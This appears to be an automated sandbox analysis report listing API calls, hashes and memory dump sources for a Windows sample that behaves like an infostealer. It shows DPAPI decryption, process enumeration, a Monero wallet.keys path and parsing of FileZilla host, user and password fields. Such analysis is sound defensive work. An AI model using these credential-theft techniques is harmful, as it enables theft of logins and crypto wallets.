                                    • Instruction ID: d37bff0887f844bf09b8a0253ca215cdd49f02af7f9ab41c1d9a50b332f14d79
                                    • Opcode Fuzzy Hash: 62aa3e04ccdfc2408b56b9cce6a74a5ad29bf32e1c0408dcabf73c712725460c
                                    • Instruction Fuzzy Hash: E5B2D5F3A0C2009FE704AE2DEC8567ABBE5EF94720F1A493DEAC4C7344E63558158697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: =J__$>RCG$AJ__$Tt_K$g|
                                    • API String ID: 0-4068420118
                                    • Opcode ID: e380497b39c13959b3da1faa7fe1b714c958d346e69ce8c4ebb95326f48592fb
                                    • Instruction ID: 00384d1b6fc9e79c0f8e68be35fbed0a63c001d0bccca03acd6fc34cb6e94005
                                    • Opcode Fuzzy Hash: e380497b39c13959b3da1faa7fe1b714c958d346e69ce8c4ebb95326f48592fb
                                    • Instruction Fuzzy Hash: 53B25AF36082049FE704AE2DEC8567ABBE6EFD4720F1A463DE6C4C7744E93598058687
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0094C871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0094C87C
                                    • lstrcat.KERNEL32(?,00960B46), ref: 0094C943
                                    • lstrcat.KERNEL32(?,00960B47), ref: 0094C957
                                    • lstrcat.KERNEL32(?,00960B4E), ref: 0094C978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 25f5c87a2433559fc2260da43a27ab1fd4a4ba8febdc59b59d3e072be6934848
                                    • Instruction ID: 41fdbc3cb3e480d7f8cb2f23fd98cfbf8dc767d2d6f134337d7418785b3ff837
                                    • Opcode Fuzzy Hash: 25f5c87a2433559fc2260da43a27ab1fd4a4ba8febdc59b59d3e072be6934848
                                    • Instruction Fuzzy Hash: 114182B590420AEFDB10DFA0DC89FEEB7B8BB44304F1045A9E509A7280DB745A84CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0094724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00947254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00947281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009472A4
                                    • LocalFree.KERNEL32(?), ref: 009472AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 0c437e5c47191889fa37877743aa1202946838a719817a53ec5c8abdb9bb5c27
                                    • Instruction ID: 4114664f9fd2463af334911a28daf4c23dd163ea171af9501b37738f599c5941
                                    • Opcode Fuzzy Hash: 0c437e5c47191889fa37877743aa1202946838a719817a53ec5c8abdb9bb5c27
                                    • Instruction Fuzzy Hash: A9010CB5A40208BBEB10DFD4CD4AF9EB7B8AB44B00F104555FB05AB2D0DAB4AA00CB65
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0095961E
                                    • Process32First.KERNEL32(00960ACA,00000128), ref: 00959632
                                    • Process32Next.KERNEL32(00960ACA,00000128), ref: 00959647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0095965C
                                    • CloseHandle.KERNEL32(00960ACA), ref: 0095967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 919684d6fa0ee1b890d9904c475058f83d6151f611524912308a4e4fd9e9e65d
                                    • Instruction ID: 909d5be1c90624232483a44d9aa82bac32091d10c18a3cd464da330cb1036e60
                                    • Opcode Fuzzy Hash: 919684d6fa0ee1b890d9904c475058f83d6151f611524912308a4e4fd9e9e65d
                                    • Instruction Fuzzy Hash: A4011E75A01208EBEB14DFA5DD58BEDB7F8EB48301F104189A906A7250DB349F48DF51
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009605B7), ref: 009586CA
                                    • Process32First.KERNEL32(?,00000128), ref: 009586DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 009586F3
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • CloseHandle.KERNEL32(?), ref: 00958761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 26b544374750179e6aeac74d892ba4aa0a74eaa124b89cd32f32aa5e63cc81dd
                                    • Instruction ID: e9138cfeaea92e117e4248d1ef7d7479bb9a4848b08f27b2548fede924a44a95
                                    • Opcode Fuzzy Hash: 26b544374750179e6aeac74d892ba4aa0a74eaa124b89cd32f32aa5e63cc81dd
                                    • Instruction Fuzzy Hash: 2D316D71901218ABDB24DF52CC51FEEB778FB88701F104299F90AA21A0DF306E49CFA5
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00945184,40000001,00000000,00000000,?,00945184), ref: 00958EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: a0b94971feff8753a1a9f7cbf0cf0df4eb76ec9417987068cbce27eced6dfea5
                                    • Instruction ID: 4ee1434e2efcf8b5af0557d0d086c17b5edbafe451805e6c784c669571a38f7c
                                    • Opcode Fuzzy Hash: a0b94971feff8753a1a9f7cbf0cf0df4eb76ec9417987068cbce27eced6dfea5
                                    • Instruction Fuzzy Hash: 67111870200208BFDB00CF65DC89FAB33A9AF89305F109848FD1A9B250DB35EC49DBA0
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00944EEE,00000000,?), ref: 00949B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00944EEE,00000000,?), ref: 00949B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: d5cbe5be3fab7a918a2dc6d187c57bfbf128afbd556cce2309a4c69d3f0d4662
                                    • Instruction ID: b9453c2647954fbce20a8c2cc65fc1dc0ada1a6dc9274b5d8bbf6f7a9efd3460
                                    • Opcode Fuzzy Hash: d5cbe5be3fab7a918a2dc6d187c57bfbf128afbd556cce2309a4c69d3f0d4662
                                    • Instruction Fuzzy Hash: 9011A4B4240208AFEB10CF64DC95FAA77B9FB89700F208059FA159B390C775A901CB50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00960E00,00000000,?), ref: 009579B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 009579B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00960E00,00000000,?), ref: 009579C4
                                    • wsprintfA.USER32 ref: 009579F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: b9ace93f22aff42e673c6abd384b8c7cf258889a669744bd005968ee59a5c96d
                                    • Instruction ID: 78ff71662b1b06ea3a5d325b6a625ae72eab64294fb29a62f8f56d852a748714
                                    • Opcode Fuzzy Hash: b9ace93f22aff42e673c6abd384b8c7cf258889a669744bd005968ee59a5c96d
                                    • Instruction Fuzzy Hash: 19113CB2904118ABDB14DFCADD45BBEB7F8FB4CB11F10411AF605A2290E7395940C7B1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015EDCB8,00000000,?,00960E10,00000000,?,00000000,00000000), ref: 00957A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015EDCB8,00000000,?,00960E10,00000000,?,00000000,00000000,?), ref: 00957A7D
                                    • wsprintfA.USER32 ref: 00957AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: d9d267497c000fd3f4674f37da1443ec5edcc977a8026f5911e336e93e4035c0
                                    • Instruction ID: 1a05b244546dc579d3a6e3767a7e0136c27f455db8a803cfbb6ff7fbb60eb55f
                                    • Opcode Fuzzy Hash: d9d267497c000fd3f4674f37da1443ec5edcc977a8026f5911e336e93e4035c0
                                    • Instruction Fuzzy Hash: 2511E1B0905218EBEB20CF94DC49FAAB778FB40721F00039AEA0A932D0DB341E44CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: JH$*hW;$7w]3
                                    • API String ID: 0-176607913
                                    • Opcode ID: 10bc786d55ed5637bad18d3eda4a9e092206aeb4dbbbc5c0fe7807fed0715fb4
                                    • Instruction ID: 1b66232034282082d49935f9f4f234d81eae88c075694ac92909b60b27ed1b64
                                    • Opcode Fuzzy Hash: 10bc786d55ed5637bad18d3eda4a9e092206aeb4dbbbc5c0fe7807fed0715fb4
                                    • Instruction Fuzzy Hash: D5A22AF3A0C6049FE304AE29EC8577AFBE5EFD4320F1A853DEAC497344E63558058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: J[w$cs]$ ?[
                                    • API String ID: 0-4010556661
                                    • Opcode ID: c1e8289ba810b1b6a6e826c70a4aa9cc036e0bef8046eb45e889a6c3cb28ab8d
                                    • Instruction ID: bf9a196884d2bad75baf3d2fe28e4c7a3eef1bec60d46e4ee096df9472fcd95c
                                    • Opcode Fuzzy Hash: c1e8289ba810b1b6a6e826c70a4aa9cc036e0bef8046eb45e889a6c3cb28ab8d
                                    • Instruction Fuzzy Hash: 67A207F360C6049FE704AE2DEC8577ABBE9EFD4620F1A863DE6C4C3744E93558058692
                                    APIs
                                    • CoCreateInstance.COMBASE(0095E118,00000000,00000001,0095E108,00000000), ref: 00953758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009537B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00949B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00949BA3
                                    • LocalFree.KERNEL32(?), ref: 00949BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Qbbs$Z{&u
                                    • API String ID: 0-2878677978
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: kgw
                                    • API String ID: 0-2332048456
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009615B8,00960D96), ref: 0094F71E
                                    • StrCmpCA.SHLWAPI(?,009615BC), ref: 0094F76F
                                    • StrCmpCA.SHLWAPI(?,009615C0), ref: 0094F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 0094FAC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: g@
                                    • API String ID: 0-50332989
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F)sP
                                    • API String ID: 0-3353271891
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: b{\{
                                    • API String ID: 0-957799881
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ZF~
                                    • API String ID: 0-4056117244
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ;}~
                                    • API String ID: 0-2029327934
                                    • Opcode ID: fe2847a27ddfd7f3c6a0db07a8fc0eda97ed6cc586afdce84b395b730e00a379
                                    • Instruction ID: 8a8b265a97665167dfa0b7f0cab8552202c5329dc158a184b79ba76e25fee0c3
                                    • Opcode Fuzzy Hash: fe2847a27ddfd7f3c6a0db07a8fc0eda97ed6cc586afdce84b395b730e00a379
                                    • Instruction Fuzzy Hash: 8841F4F3B192045BF3585E29EC817A6B7DAE794320F1B063DEA98C33C0ED799C054695
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 153366ee114a8fd93d4bd22578e6fdc95b56d5ea6baec351a6b55561b12230a7
                                    • Instruction ID: 485a53d209a9f614713fc5a250acf0634bb164aad832e749627c76a8249d2592
                                    • Opcode Fuzzy Hash: 153366ee114a8fd93d4bd22578e6fdc95b56d5ea6baec351a6b55561b12230a7
                                    • Instruction Fuzzy Hash: AB7119F3A086145FE3106E2EDC4876ABBD6DBD4320F17463DDBD8D3784EA3598028686
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1cee8aff3ba7746c14c8dfd7defafaa4ebaeba97d6461f2db1a5d284e7368c4a
                                    • Instruction ID: bf22d107ed38ec115cb3a215406392fe323a6aa13dba36a40ce6090c61332c8c
                                    • Opcode Fuzzy Hash: 1cee8aff3ba7746c14c8dfd7defafaa4ebaeba97d6461f2db1a5d284e7368c4a
                                    • Instruction Fuzzy Hash: E25123B3A087049FE3046E28DC8627AF7E9EF90320F1B493DD6C4C3740E97598448682
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3169f6aff43da90403c280d5849e732f79bac7772d7662618f5e89012854c937
                                    • Instruction ID: 1a71afd83234aa2beadc29286865b0905d38c1cdffbeb651ea1d1f092513162f
                                    • Opcode Fuzzy Hash: 3169f6aff43da90403c280d5849e732f79bac7772d7662618f5e89012854c937
                                    • Instruction Fuzzy Hash: FD4155B2A1C3049BD3587F28EC9567AFBE5EF94710F17082DE6C587680EA3555808B8B
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e6e7a1f5d0961037e53ac3c4ba285bf903558a05a118aa4be9649cfc65ec22e
                                    • Instruction ID: a615cb5c943845ab5b50a3149e6469dcd6b79a79b8be40e467e7f4c36f0624c9
                                    • Opcode Fuzzy Hash: 0e6e7a1f5d0961037e53ac3c4ba285bf903558a05a118aa4be9649cfc65ec22e
                                    • Instruction Fuzzy Hash: 433115F3B086008FF754EE2DDC8576AB6D2EBC4310F1A893DD689D3B84E93958058696
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 700c0f88ba818fecbca96f4398f64b6b845ee3fc5dda25a213d2e3fb5bfc3082
                                    • Instruction ID: 11fbc3b5fd542bf4cb4b25ab1f01a1c40b108cf5ca526fe134af6cb3e9ea8cdb
                                    • Opcode Fuzzy Hash: 700c0f88ba818fecbca96f4398f64b6b845ee3fc5dda25a213d2e3fb5bfc3082
                                    • Instruction Fuzzy Hash: 493129F3E043215BE3149979ED5477BB2D9DB90320F2B463DDA84A7384E97D4D0182C6
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1e01cccabf90ff75de48ae5453fdd8bf32f0be7626261f6cabdef9b5d064a25
                                    • Instruction ID: 401455bdf5e2351a294c19c349c5ab20243b3b163846df79d1c313c8656d0139
                                    • Opcode Fuzzy Hash: b1e01cccabf90ff75de48ae5453fdd8bf32f0be7626261f6cabdef9b5d064a25
                                    • Instruction Fuzzy Hash: FC315CB3B093041BE314592FEC4572BB39ADBD0734F1BC63EDA4587785ED79680A4291
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ff6479d516b0f3b56fc0cff9f0a20725039ceb522d483d64d030d9893ff3476
                                    • Instruction ID: 7e8e220e287d1e21ed41df89134f67031e2100a51e739d28884a2907d43619d4
                                    • Opcode Fuzzy Hash: 7ff6479d516b0f3b56fc0cff9f0a20725039ceb522d483d64d030d9893ff3476
                                    • Instruction Fuzzy Hash: F33127B39082145BE3542979ED497BBBB98EB84330F2B063DEAC893B41E97949058191
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9e737847b7f8ee824912c3a9ed28930902efbb79eea0cf125100e6f8b1aa29d5
                                    • Instruction ID: ce92c48bca7e89c090d63c86e2c4e9ca7aa1d72c963a9d44dcb5dc922e5c7604
                                    • Opcode Fuzzy Hash: 9e737847b7f8ee824912c3a9ed28930902efbb79eea0cf125100e6f8b1aa29d5
                                    • Instruction Fuzzy Hash: 3E312DF290C214AFE705BF29DC426AAFBE5EF68310F06492DE6D583250E73198508B87
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                      • Part of subcall function 009499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                      • Part of subcall function 009499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                      • Part of subcall function 009499C0: ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                      • Part of subcall function 009499C0: LocalFree.KERNEL32(0094148F), ref: 00949A90
                                      • Part of subcall function 009499C0: CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                      • Part of subcall function 00958E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00958E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00960DBA,00960DB7,00960DB6,00960DB3), ref: 00950362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00950369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00950385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 009503CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 009503DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00950419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00950463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 0095051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 0095054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00950562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00950571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00950580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00950593
                                    • lstrcat.KERNEL32(?,00961678), ref: 009505A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 009505B5
                                    • lstrcat.KERNEL32(?,0096167C), ref: 009505C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 009505D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 009505E6
                                    • lstrcat.KERNEL32(?,00961688), ref: 009505F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00950604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00950617
                                    • lstrcat.KERNEL32(?,00961698), ref: 00950626
                                    • lstrcat.KERNEL32(?,0096169C), ref: 00950635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 0095068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
